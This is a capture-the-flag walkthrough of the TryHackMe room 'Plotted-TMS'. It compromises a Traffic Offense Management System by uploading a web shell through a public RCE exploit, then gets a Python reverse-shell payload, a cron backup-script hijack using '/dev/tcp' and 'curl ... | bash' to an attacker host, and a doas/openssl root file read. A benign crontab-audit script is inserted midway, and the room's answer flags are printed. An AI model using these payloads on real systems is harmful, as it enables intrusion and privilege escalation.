【TryHackMe】Plotted-TMS:Walkthrough

Overview

This is a walkthrough of the TryHackMe room "Plotted-TMS".

Task 1

Q1. What is user.txt?

Run a port scan.

$ nmap -Pn -T4 -sVC -A -p- 10.10.40.74 -oN nmap_result
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a3:6a:9c:b1:12:60:b2:72:13:09:84:cc:38:73:44:4f (RSA)
|   256 b9:3f:84:00:f4:d1:fd:c8:e7:8d:98:03:38:74:a1:4d (ECDSA)
|_  256 d0:86:51:60:69:46:b2:e1:39:43:90:97:a6:af:96:93 (ED25519)
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
445/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The open ports are now known.

Port  Service  Version
22    ssh      OpenSSH 8.2p1
80    http     Apache httpd 2.4.41
445   http     Apache httpd 2.4.41

Run a directory scan against port 445.

$ dirsearch -u http://10.10.40.74:445
[09:10:32] 301 -  320B  - /management  ->  http://10.10.40.74:445/management/
[09:10:32] 200 -    4KB - /management/

$ dirsearch -u http://10.10.40.74:445/management
[09:12:19] 200 -  166B  - /management/404.html
[09:12:22] 200 -  583B  - /management/about.html
[09:12:25] 301 -  326B  - /management/admin  ->  http://10.10.40.74:445/management/admin/
[09:12:27] 200 -    5KB - /management/admin/
[09:12:28] 200 -    5KB - /management/admin/index.php
[09:12:28] 200 -    2KB - /management/admin/login.php
[09:12:44] 301 -  327B  - /management/assets  ->  http://10.10.40.74:445/management/assets/
[09:12:44] 200 -  463B  - /management/assets/
[09:12:48] 301 -  326B  - /management/build  ->  http://10.10.40.74:445/management/build/
[09:12:49] 200 -  484B  - /management/build/
[09:12:51] 301 -  328B  - /management/classes  ->  http://10.10.40.74:445/management/classes/
[09:12:52] 200 -  541B  - /management/classes/
[09:12:53] 200 -    0B  - /management/config.php
[09:12:58] 301 -  329B  - /management/database  ->  http://10.10.40.74:445/management/database/
[09:12:58] 200 -  478B  - /management/database/
[09:13:00] 200 -  471B  - /management/dist/
[09:13:00] 301 -  325B  - /management/dist  ->  http://10.10.40.74:445/management/dist/
[09:13:13] 301 -  324B  - /management/inc  ->  http://10.10.40.74:445/management/inc/
[09:13:13] 200 -  500B  - /management/inc/
[09:13:19] 301 -  325B  - /management/libs  ->  http://10.10.40.74:445/management/libs/
[09:13:31] 301 -  326B  - /management/pages  ->  http://10.10.40.74:445/management/pages/
[09:13:31] 200 -  497B  - /management/pages/
[09:13:37] 301 -  328B  - /management/plugins  ->  http://10.10.40.74:445/management/plugins/
[09:13:37] 200 -    1KB - /management/plugins/
[09:13:59] 301 -  328B  - /management/uploads  ->  http://10.10.40.74:445/management/uploads/
[09:13:59] 200 -  574B  - /management/uploads/

The /management directory was found.
Access it.

(screenshot: manage.jpg)

Access the login page.

(screenshot: login form.jpg)

Searching for Traffic Offense Management System turns up an RCE exploit for version 1.0.

Run the PoC.

$ python2.7 exploit.py                                       

Example: http://example.com

Url: http://10.10.40.74:445/management
Check Url ...

[+] Bypass Login

[+] Upload Shell

[+] Exploit Done!

$ whoami
Traceback (most recent call last):
  File "exploit.py", line 58, in <module>
    request = requests.post(find_shell.get("src") + "?cmd=" + cmd, data={'key':'value'}, headers=headers)
  File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/api.py", line 119, in post
  File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/api.py", line 61, in request
  File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 516, in request
  File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 459, in prepare_request
  File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/models.py", line 314, in prepare
  File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/models.py", line 388, in prepare_url
requests.exceptions.MissingSchema: Invalid URL '/management/uploads/1727616060_evil.php?cmd=whoami': No schema supplied. Perhaps you meant http:///management/uploads/1727616060_evil.php?cmd=whoami?

The shell was uploaded, but the command could not be executed because of an error in the requests library.
However, the error message reveals the path of the uploaded RCE file, so send a request with a reverse-shell payload in the cmd parameter.

http://10.10.40.74:445/management/uploads/1727616060_evil.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.6.55.144%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22sh%22)%27

With Netcat listening, a reverse shell was obtained.

$ nc -lvnp 1234                                       
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.40.74] 33014
$ whoami
whoami
www-data

Next, aim for privilege escalation to plot_admin.

$ ls -la /home
ls -la
total 16
drwxr-xr-x  4 root       root       4096 Oct 28  2021 .
drwxr-xr-x 20 root       root       4096 Oct 25  2021 ..
drwxr-xr-x  4 plot_admin plot_admin 4096 Oct 28  2021 plot_admin
drwxr-xr-x  4 ubuntu     ubuntu     4096 Oct 28  2021 ubuntu

Checking /etc/crontab shows a script configured to run as the plot_admin account.

$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   plot_admin /var/www/scripts/backup.sh
#

Looking at /var/www/scripts/backup.sh, it performs a backup.

$ cat /var/www/scripts/backup.sh
cat /var/www/scripts/backup.sh
#!/bin/bash

/usr/bin/rsync -a /var/www/html/management /home/plot_admin/tms_backup
/bin/chmod -R 770 /home/plot_admin/tms_backup/management

The /var/www/scripts directory is fully controlled by the www-data account.

$ ls -la /var/www
ls -la /var/www
total 16
drwxr-xr-x  4 root     root     4096 Oct 28  2021 .
drwxr-xr-x 14 root     root     4096 Oct 28  2021 ..
drwxr-xr-x  4 root     root     4096 Oct 28  2021 html
drwxr-xr-x  2 www-data www-data 4096 Oct 28  2021 scripts
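The misconfiguration shown above (a cron job that runs as plot_admin but executes a script living in a directory owned by www-data) is exactly what a defender should audit for. The following Python script is an added example, not code from the walkthrough or the room: it parses /etc/crontab-style text and flags jobs whose script, or the script's directory, is owned by neither root nor the job's user or is world-writable. The SAMPLE_* data is constructed to mirror the listing above, and statfn/owner_of are injectable so the check runs offline.

```python
import os
import pwd
import stat

def parse_system_crontab(text):
    """(user, command) pairs from /etc/crontab text; comments and VAR= lines are skipped."""
    jobs = []
    for line in (ln.strip() for ln in text.splitlines()):
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, 6)  # 5 time fields, the user, then the command
        if len(parts) == 7:
            jobs.append((parts[5], parts[6]))
    return jobs

def weaknesses(path, job_user, statfn, owner_of):
    """Reasons a third user could change what the job runs: the script or its
    directory is owned by neither root nor job_user, or is world-writable."""
    found = []
    for p in (path, os.path.dirname(path)):
        st = statfn(p)  # statfn returns None when the path does not exist
        if st is None:
            continue
        owner = owner_of(st.st_uid)
        if owner not in ("root", job_user):
            found.append(f"{p} owned by {owner}, job runs as {job_user}")
        if st.st_mode & stat.S_IWOTH:
            found.append(f"{p} is world-writable")
    return found

def audit(text, statfn=lambda p: os.stat(p) if os.path.exists(p) else None,
          owner_of=lambda uid: pwd.getpwuid(uid).pw_name):
    """Map each risky script (first absolute path token of a job) to its reasons."""
    report = {}
    for user, command in parse_system_crontab(text):
        path = next((t for t in command.split() if t.startswith("/") and len(t) > 1), None)
        issues = weaknesses(path, user, statfn, owner_of) if path else []
        if issues:
            report[path] = issues
    return report

# Constructed sample mirroring the room: job runs as plot_admin, script and its dir owned by www-data (uid 33)
SAMPLE_CRONTAB = """SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *     * * *   plot_admin /var/www/scripts/backup.sh"""
SAMPLE_FS = {p: os.stat_result((m, 0, 0, 0, 33, 0, 0, 0, 0, 0)) for p, m in
             [("/var/www/scripts", 0o40755), ("/var/www/scripts/backup.sh", 0o100755)]}
SAMPLE_USERS = {0: "root", 33: "www-data", 1000: "plot_admin"}

def audit_sample():
    return audit(SAMPLE_CRONTAB, SAMPLE_FS.get, SAMPLE_USERS.get)
```

Calling audit(open("/etc/crontab").read()) with the defaults runs the same check against the live system; the root job in the sample is not flagged because /etc/cron.hourly is not in the constructed file table.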

Rename /var/www/scripts/backup.sh to a different file name.

$ mv backup.sh backup.sh.org

On Kali, create a reverse-shell payload file.

shell.sh
#!/bin/bash

bash -i >& /dev/tcp/10.6.55.144/1234 0>&1

Start an HTTP server.

$ python -m http.server 80

Place the reverse-shell file just created on the target machine as backup.sh.

www-data@plotted:/var/www/scripts$ echo "curl http://10.6.55.144/shell.sh|bash" > backup.sh

With Netcat listening, a shell as plot_admin was obtained.

$ nc -lvnp 12345
listening on [any] 12345 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.40.74] 55188
bash: cannot set terminal process group (31784): Inappropriate ioctl for device
bash: no job control in this shell
plot_admin@plotted:~$ whoami
whoami
plot_admin

Set up a TTY.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

The user.txt flag can be obtained from /home/plot_admin/user.txt.

/home/plot_admin/user.txt
77927510d5edacea1f9e86602f1fbadb

A. 77927510d5edacea1f9e86602f1fbadb

Q2. What is root.txt?

Run linpeas.

./linpeas

doas.conf was picked up.

╔══════════╣ Checking doas.conf
permit nopass plot_admin as root cmd openssl

openssl can apparently be run with root privileges, so search GTFOBins.

Using the file-read technique, the root flag can be obtained.

$ LFILE=/root/root.txt
$ /usr/bin/doas openssl enc -in "$LFILE"
Congratulations on completing this room!

53f85e2da3e874426fa059040a9bdcab

Hope you enjoyed the journey!

Do let me know if you have any ideas/suggestions for future rooms.
-sa.infinity8888

A. 53f85e2da3e874426fa059040a9bdcab